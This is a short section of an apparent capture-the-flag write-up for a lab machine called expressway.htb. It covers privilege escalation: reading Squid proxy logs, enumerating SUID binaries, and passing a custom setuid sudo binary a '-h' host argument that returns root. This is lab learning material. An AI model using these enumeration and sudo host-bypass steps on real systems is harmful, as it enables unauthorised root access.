Priv Esc

freakingrockstarontheroad

ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

ike@expressway:~$ ls -l /var/log/squid
total 20
-rw-r----- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
-rw-r----- 1 proxy proxy   20 Jul 22 19:32 access.log.2.gz
-rw-r----- 1 proxy proxy 2192 Jul 23 01:47 cache.log.1
-rw-r----- 1 proxy proxy  941 Jul 23 01:47 cache.log.2.gz
ike@expressway:~$ cat /var/log/squid/access.log.1
<SNIP>
1753229688.902      0 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
1753229688.902      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
1753229689.010      0 192.168.68.50 NONE_NONE/400 3896 OPTIONS / - HIER_NONE/- text/html

ike@expressway:~$ ss -anp | grep 127.0.0.1
RTNETLINK answers: Invalid argument
tcp   LISTEN 0      20                                                  127.0.0.1:25               0.0.0.0:*

❯ echo 10.10.11.87 expressway.htb offramp.expressway.htb | sudo tee -a /etc/hosts
[sudo] password for adot:
10.10.11.87 expressway.htb offramp.expressway.htb

Custom sudo binary

ike@expressway:~$ find / -type f -perm -04000 -ls 2>/dev/null
   286198   1500 -rwsr-xr-x   1 root     root      1533496 Aug 14 12:58 /usr/sbin/exim4
   275230   1024 -rwsr-xr-x   1 root     root      1047040 Aug 29 15:18 /usr/local/bin/sudo
   262859    116 -rwsr-xr-x   1 root     root       118168 Aug 26 22:05 /usr/bin/passwd
   260733     76 -rwsr-xr-x   1 root     root        76240 Sep  9 10:09 /usr/bin/mount
   262858     88 -rwsr-xr-x   1 root     root        88568 Aug 26 22:05 /usr/bin/gpasswd
   275693     92 -rwsr-xr-x   1 root     root        92624 Sep  9 10:09 /usr/bin/su
   264516    276 -rwsr-xr-x   1 root     root       281624 Jun 27  2023 /usr/bin/sudo
   260734     64 -rwsr-xr-x   1 root     root        63952 Sep  9 10:09 /usr/bin/umount
   262855     72 -rwsr-xr-x   1 root     root        70888 Aug 26 22:05 /usr/bin/chfn
   262856     52 -rwsr-xr-x   1 root     root        52936 Aug 26 22:05 /usr/bin/chsh
   263438     20 -rwsr-xr-x   1 root     root        18888 Sep  9 10:09 /usr/bin/newgrp
   262814     52 -rwsr-xr--   1 root     messagebus    51272 Mar  8  2025 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   265222    484 -rwsr-xr-x   1 root     root         494144 Aug 10 00:07 /usr/lib/openssh/ssh-keysign
     5397     16 -r-sr-xr-x   1 root     root          13712 Aug 28 09:04 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
     5391     16 -r-sr-xr-x   1 root     root          14416 Aug 28 09:04 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper

-h for host???

ike@expressway:~$ /usr/local/bin/sudo -h expressway id
Password:
ike is not allowed to run sudo on expressway.
ike@expressway:~$ /usr/local/bin/sudo -h offramp.expressway.htb id
uid=0(root) gid=0(root) groups=0(root)

PreviousFoothold NextCredentials

Last updated 2 months ago

Was this helpful?